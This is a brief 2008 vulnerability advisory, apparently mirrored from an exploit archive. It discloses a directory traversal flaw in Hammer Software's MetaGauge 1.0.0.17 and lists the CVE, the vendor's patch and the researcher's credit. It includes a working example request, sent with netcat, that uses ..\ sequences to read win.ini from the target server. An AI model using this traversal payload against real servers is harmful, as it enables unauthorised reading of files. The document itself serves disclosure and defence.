Hammer Software MetaGauge 1.0.0.17 Directory Traversal Vulnerability
Published:2008-10-06
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
Title: MetaGauge 1.0.0.17 Directory Traversal ------------------------------------------------------------- Vendor: Hammer Software Vendor URL: www.Hammer-Software.com Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release. Description: A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote user to view files local to the target server. Example: C:\> nc targethost 2004 GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1 Patch Information: Hammer has addressed the issue in the latest version of MetaGauge: http://dl.hammer-software.com/metagauge.zip CVE: CVE-2008-4421 Credit: Brad Antoniewicz brad.antoniewicz@foundstone.com
// Sebug.net [ 2008-10-07 ]